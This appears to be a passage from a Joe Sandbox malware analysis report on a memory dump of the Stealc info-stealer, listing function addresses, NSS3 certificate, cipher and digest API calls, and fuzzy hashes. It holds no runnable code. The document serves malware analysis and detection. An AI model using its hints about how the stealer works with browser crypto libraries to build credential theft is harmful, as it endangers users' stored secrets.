Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
String ID:
API String ID: 3394263606-0
Opcode ID: ce1e62998cd3bbba12686241430ae16ceaca448cabb943b94e847df9a832d975
Instruction ID: 44307bafc9ed488c05660167281dc896824ebc1825218f84056e8b403ceeb0d0
Opcode Fuzzy Hash: ce1e62998cd3bbba12686241430ae16ceaca448cabb943b94e847df9a832d975
Instruction Fuzzy Hash: 88518670A09705DFDB10EFA8C28466EBBF0BF44355F158D28D8989BB10DB31E885CB91

Function 6C9A9EA0 Relevance: 12.1, APIs: 8, Instructions: 136COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C9A9EC0
EnterCriticalSection.KERNEL32(?), ref: 6C9A9EF9
_PR_MD_UNLOCK.NSS3(?), ref: 6C9A9F73
EnterCriticalSection.KERNEL32(?), ref: 6C9A9FA5
_PR_MD_NOTIFY_CV.NSS3(-00000074), ref: 6C9A9FCF
_PR_MD_UNLOCK.NSS3(?), ref: 6C9A9FF2
_PR_MD_UNLOCK.NSS3(?), ref: 6C9AA01D

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: CriticalEnterSection
String ID:
API String ID: 1904992153-0
Opcode ID: f3e07ad53734a55863d11b4e2659ecf01172796cb3517970626768b3f23f6b11
Instruction ID: a7e8dbbf8e2013eb1bb9d05f87cab26a764006565497782eccfa87f3c84486a0
Opcode Fuzzy Hash: f3e07ad53734a55863d11b4e2659ecf01172796cb3517970626768b3f23f6b11
Instruction Fuzzy Hash: DE51A1B2800600DBCB10DF65D48464AB7F4FF29319F26856AD85957B12E731EC9ACFD1

Function 6C89DCE0 Relevance: 12.1, APIs: 8, Instructions: 90stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C89DCFA

Part of subcall function 6C959DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C9A0A27), ref: 6C959DC6
Part of subcall function 6C959DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C9A0A27), ref: 6C959DD1
Part of subcall function 6C959DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C959DED

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C89DD40
CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6C89DD62
CERT_DestroyCertificate.NSS3(?), ref: 6C89DD71
CERT_DestroyCertificate.NSS3(00000000), ref: 6C89DD81
CERT_RemoveCertListNode.NSS3(?), ref: 6C89DD8F

Part of subcall function 6C8B06A0: TlsGetValue.KERNEL32 ref: 6C8B06C2
Part of subcall function 6C8B06A0: EnterCriticalSection.KERNEL32(?), ref: 6C8B06D6
Part of subcall function 6C8B06A0: PR_Unlock.NSS3 ref: 6C8B06EB

CERT_DestroyCertificate.NSS3(?), ref: 6C89DD9E
CERT_DestroyCertificate.NSS3(?), ref: 6C89DDB7

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: CertificateDestroy$Time$CertSystem$CriticalEnterFileFindIssuerListNodeRemoveSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strcmp
String ID:
API String ID: 653623313-0
Opcode ID: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
Instruction ID: e8a550e547f3b176409d386f05f4bb2299678685051a05a94e2e8a6e2b5b0ce9
Opcode Fuzzy Hash: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
Instruction Fuzzy Hash: 4721AEB6E011199FDF219EADDE4099FB7B4AF05209B140831ED08A7721E731E9158BE1

Function 6C893C90 Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,6C90460B,?,?), ref: 6C893CA9
EnterCriticalSection.KERNEL32(?), ref: 6C893CB9
PL_HashTableLookup.NSS3(?), ref: 6C893CC9
SECITEM_DupItem_Util.NSS3(00000000), ref: 6C893CD6
PR_Unlock.NSS3 ref: 6C893CE6
CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6C893CF6
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C893D03
PR_Unlock.NSS3 ref: 6C893D15

Part of subcall function 6C93DD70: TlsGetValue.KERNEL32 ref: 6C93DD8C
Part of subcall function 6C93DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C93DDB4

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
String ID:
API String ID: 1376842649-0
Opcode ID: 38b48c4a54de8c026f8e36b4d1828cc91f92cbdedb58f616ce329fbf071b388a
Instruction ID: e6334a3177a43e662689096000619cb0239564dc1022100fca6f9c7679c4fce0
Opcode Fuzzy Hash: 38b48c4a54de8c026f8e36b4d1828cc91f92cbdedb58f616ce329fbf071b388a
Instruction Fuzzy Hash: F7112C77E04504A7DB212A2CBD059AA3A38EF5325DB280930EC2C53B11F732DD58D7D1

Function 6C899C50 Relevance: 10.8, APIs: 7, Instructions: 253stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C8B11C0: PR_NewLock.NSS3 ref: 6C8B1216

free.MOZGLUE(?), ref: 6C899E17
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C899E25
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C899E4E
TlsGetValue.KERNEL32 ref: 6C899EA2

Part of subcall function 6C8A9500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6C8A9546

EnterCriticalSection.KERNEL32(?), ref: 6C899EB6
PR_Unlock.NSS3 ref: 6C899ED9
PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C899F18

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
String ID:
API String ID: 3381623595-0
Opcode ID: 9ba2f05ae856d2b92c14b1ec5c652fe663f1d16cfd8ea10b3e6739f697f6d7e6
Instruction ID: 591e25b1106afc2cca6f790b6b248069ed438b2b55927b6bfa1f4022da491d94
Opcode Fuzzy Hash: 9ba2f05ae856d2b92c14b1ec5c652fe663f1d16cfd8ea10b3e6739f697f6d7e6
Instruction Fuzzy Hash: BF8119B1A00601AFEB209F7CDD41AAB77A9BF55248F144D38E84D87B11FB31E915C7A1

Function 6C8ADCB0 Relevance: 10.7, APIs: 7, Instructions: 245stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C8AAB10: DeleteCriticalSection.KERNEL32(D958E852,6C8B1397,5B5F5EC0,?,?,6C8AB1EE,2404110F,?,?), ref: 6C8AAB3C
Part of subcall function 6C8AAB10: free.MOZGLUE(D958E836,?,6C8AB1EE,2404110F,?,?), ref: 6C8AAB49
Part of subcall function 6C8AAB10: DeleteCriticalSection.KERNEL32(5D5E6CAA), ref: 6C8AAB5C
Part of subcall function 6C8AAB10: free.MOZGLUE(5D5E6C9E), ref: 6C8AAB63
Part of subcall function 6C8AAB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6C8AAB6F
Part of subcall function 6C8AAB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6C8AAB76

TlsGetValue.KERNEL32 ref: 6C8ADCFA
EnterCriticalSection.KERNEL32(00000000), ref: 6C8ADD0E
PK11_IsFriendly.NSS3(?), ref: 6C8ADD73
PK11_IsLoggedIn.NSS3(?,00000000), ref: 6C8ADD8B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C8ADE81
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C8ADEA6
PR_Unlock.NSS3(?), ref: 6C8ADF08

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
String ID:
API String ID: 519503562-0
Opcode ID: 36b37dbc1a9ba7a83ce416da88c5905754fee40be4d57d722b8c2abc33961f27
Instruction ID: 2a56f3a8c8180c3948a6fb37c6002b045810febb437f00c2b23800c215f19973
Opcode Fuzzy Hash: 36b37dbc1a9ba7a83ce416da88c5905754fee40be4d57d722b8c2abc33961f27
Instruction Fuzzy Hash: A091D7B5E001059FDB20CF98DA80BABB7B1AF54309F144826DD19DBB41E731E957CB91

Function 6C882D20 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 6C882D69

Strings

winSeekFile, xrefs: 6C882E9C
winUnmapfile1, xrefs: 6C882F55
winUnmapfile2, xrefs: 6C882F7F
winTruncate2, xrefs: 6C882EF8
winTruncate1, xrefs: 6C882EBE

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: __allrem
String ID: winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2
API String ID: 2933888876-3221253098
Opcode ID: bb7537f61cd8684a513bf0e380513ef5cadb85a33872e1ecb695c322d6d64d49
Instruction ID: 6b7033878c83e6f0dae5a497e4ca0fff983649688833c4bdaf672f030734961d
Opcode Fuzzy Hash: bb7537f61cd8684a513bf0e380513ef5cadb85a33872e1ecb695c322d6d64d49
Instruction Fuzzy Hash: 5461DF71B01208DFDB54CF68DD84A6A7BB1FF49314F248628E915ABB80DB34EC06CB94

Function 6C8BDEF0 Relevance: 10.7, APIs: 7, Instructions: 159COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C8BDF37
EnterCriticalSection.KERNEL32(?), ref: 6C8BDF4B
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C8BDF96
PR_SetError.NSS3(00000000,00000000), ref: 6C8BE02B
PR_Unlock.NSS3(?), ref: 6C8BE07E
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C8BE090
PR_Unlock.NSS3(?), ref: 6C8BE0AF

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Error$Unlock$CriticalEnterSectionValue
String ID:
API String ID: 4073542275-0
Opcode ID: b42840194dbd7a5de56dba6ecda5971a9b7616dee6082f5b045271089217004f
Instruction ID: e864d0757350597b2130a99bac13e8dc5714ee0a8190bfcdc63a0c2fbca70cd6
Opcode Fuzzy Hash: b42840194dbd7a5de56dba6ecda5971a9b7616dee6082f5b045271089217004f
Instruction Fuzzy Hash: F551DF35604604DFEB309E28DA44B5A73B1BF54308F204D69E85A67BA1D731E849CB92

Function 6C8DAC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C8DAB3E,?,?,?), ref: 6C8DAC35

Part of subcall function 6C8BCEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C8BCF16

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C8DAB3E,?,?,?), ref: 6C8DAC55

Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F10F3
Part of subcall function 6C8F10C0: EnterCriticalSection.KERNEL32(?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F110C
Part of subcall function 6C8F10C0: PL_ArenaAllocate.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1141
Part of subcall function 6C8F10C0: PR_Unlock.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1182
Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F119C

PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C8DAB3E,?,?), ref: 6C8DAC70

Part of subcall function 6C8BE300: TlsGetValue.KERNEL32 ref: 6C8BE33C
Part of subcall function 6C8BE300: EnterCriticalSection.KERNEL32(?), ref: 6C8BE350
Part of subcall function 6C8BE300: PR_Unlock.NSS3(?), ref: 6C8BE5BC
Part of subcall function 6C8BE300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C8BE5CA
Part of subcall function 6C8BE300: TlsGetValue.KERNEL32 ref: 6C8BE5F2
Part of subcall function 6C8BE300: EnterCriticalSection.KERNEL32(?), ref: 6C8BE606
Part of subcall function 6C8BE300: PORT_Alloc_Util.NSS3(?), ref: 6C8BE613

PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C8DAC92
PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C8DAB3E), ref: 6C8DACD7
PORT_Alloc_Util.NSS3(?), ref: 6C8DAD10
memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C8DAD2B

Part of subcall function 6C8BF360: TlsGetValue.KERNEL32(00000000,?,6C8DA904,?), ref: 6C8BF38B
Part of subcall function 6C8BF360: EnterCriticalSection.KERNEL32(?,?,?,6C8DA904,?), ref: 6C8BF3A0
Part of subcall function 6C8BF360: PR_Unlock.NSS3(?,?,?,?,6C8DA904,?), ref: 6C8BF3D3

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
String ID:
API String ID: 2926855110-0
Opcode ID: a67a02bde32f32154de33aaae714735a57615c457d1d610bc7ebb54c056afc9a
Instruction ID: 0577454e44e266bc72699cb0e67df3e33558cfb2fc8073139f97c02a3219c180
Opcode Fuzzy Hash: a67a02bde32f32154de33aaae714735a57615c457d1d610bc7ebb54c056afc9a
Instruction Fuzzy Hash: 93314CB1E002055FEB20DF69DD409EF7776EF84728B2A8938E81597741EB31EC1587A1

Function 6C8B8C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C8B8C7C

Part of subcall function 6C959DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C9A0A27), ref: 6C959DC6
Part of subcall function 6C959DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C9A0A27), ref: 6C959DD1
Part of subcall function 6C959DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C959DED

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C8B8CB0
TlsGetValue.KERNEL32 ref: 6C8B8CD1
EnterCriticalSection.KERNEL32(?), ref: 6C8B8CE5
PR_Unlock.NSS3(?), ref: 6C8B8D2E
PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C8B8D62
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C8B8D93

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
String ID:
API String ID: 3131193014-0
Opcode ID: 960f91ca6c15c10df389a5034675c9fb51f7a6c38fdad194192f5ec9bde470f8
Instruction ID: 2cef81c6cd3789465cf355c84393049077cc36771686c54c3c055b42c9fe8aef
Opcode Fuzzy Hash: 960f91ca6c15c10df389a5034675c9fb51f7a6c38fdad194192f5ec9bde470f8
Instruction Fuzzy Hash: FD313771A01216AFE7109F68DD407AA7770BF65319F28053BEA1977B50D730B924CBC1

Function 6C8F9D60 Relevance: 10.6, APIs: 7, Instructions: 108memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6C8F9C5B), ref: 6C8F9D82

Part of subcall function 6C8F14C0: TlsGetValue.KERNEL32 ref: 6C8F14E0
Part of subcall function 6C8F14C0: EnterCriticalSection.KERNEL32 ref: 6C8F14F5
Part of subcall function 6C8F14C0: PR_Unlock.NSS3 ref: 6C8F150D

PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6C8F9C5B), ref: 6C8F9DA9

Part of subcall function 6C8F1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C89895A,00000000,?,00000000,?,00000000,?,00000000,?,6C88F599,?,00000000), ref: 6C8F136A
Part of subcall function 6C8F1340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C89895A,00000000,?,00000000,?,00000000,?,00000000,?,6C88F599,?,00000000), ref: 6C8F137E
Part of subcall function 6C8F1340: PL_ArenaGrow.NSS3(?,6C88F599,?,00000000,?,6C89895A,00000000,?,00000000,?,00000000,?,00000000,?,6C88F599,?), ref: 6C8F13CF
Part of subcall function 6C8F1340: PR_Unlock.NSS3(?,?,6C89895A,00000000,?,00000000,?,00000000,?,00000000,?,6C88F599,?,00000000), ref: 6C8F145C

PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6C8F9C5B), ref: 6C8F9DCE

Part of subcall function 6C8F1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C89895A,00000000,?,00000000,?,00000000,?,00000000,?,6C88F599,?,00000000), ref: 6C8F13F0
Part of subcall function 6C8F1340: PL_ArenaGrow.NSS3(?,6C88F599,?,?,?,00000000,00000000,?,6C89895A,00000000,?,00000000,?,00000000,?,00000000), ref: 6C8F1445

PORT_ArenaAlloc_Util.NSS3(?,00000008,6C8F9C5B), ref: 6C8F9DDC
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6C8F9C5B), ref: 6C8F9DFE
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6C8F9C5B), ref: 6C8F9E43
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,6C8F9C5B), ref: 6C8F9E91

Part of subcall function 6C93C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C93C2BF

Part of subcall function 6C8F1560: TlsGetValue.KERNEL32(00000000,00000000,?,?,?,6C8EFAAB,00000000), ref: 6C8F157E
Part of subcall function 6C8F1560: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C8EFAAB,00000000), ref: 6C8F1592
Part of subcall function 6C8F1560: memset.VCRUNTIME140(?,00000000,?), ref: 6C8F1600
Part of subcall function 6C8F1560: PL_ArenaRelease.NSS3(?,?), ref: 6C8F1620
Part of subcall function 6C8F1560: PR_Unlock.NSS3(?), ref: 6C8F1639

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Arena$Util$Value$Alloc_CriticalEnterSectionUnlock$GrowGrow_$ErrorMark_Releasememset
String ID:
API String ID: 3425318038-0
Opcode ID: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
Instruction ID: cf82e3824ae93d6ea92608369532efba5d780a762b19634f362a7005e96b11eb
Opcode Fuzzy Hash: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
Instruction Fuzzy Hash: 6B41B7B4601506AFE750DF14D940B92B7A1FF45398F548528D8248BF91EB73E435CF90

Function 6C8BDDD0 Relevance: 10.6, APIs: 7, Instructions: 106COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C8BDDEC

Part of subcall function 6C8F0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C8F08B4

PK11_DigestBegin.NSS3(00000000), ref: 6C8BDE70
PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6C8BDE83
HASH_ResultLenByOidTag.NSS3(?), ref: 6C8BDE95
PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6C8BDEAE
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C8BDEBB
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C8BDECC

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: K11_$Digest$Error$BeginContextDestroyFinalFindResultTag_Util
String ID:
API String ID: 1091488953-0
Opcode ID: 821f6a28145d684adf03f511d841fa0a25de197cb70631d9ce246a6900e8911f
Instruction ID: 5bff598164045ac1385522bd3ec3f9ad91f1dac4bb7ce56b48dd8796edda925d
Opcode Fuzzy Hash: 821f6a28145d684adf03f511d841fa0a25de197cb70631d9ce246a6900e8911f
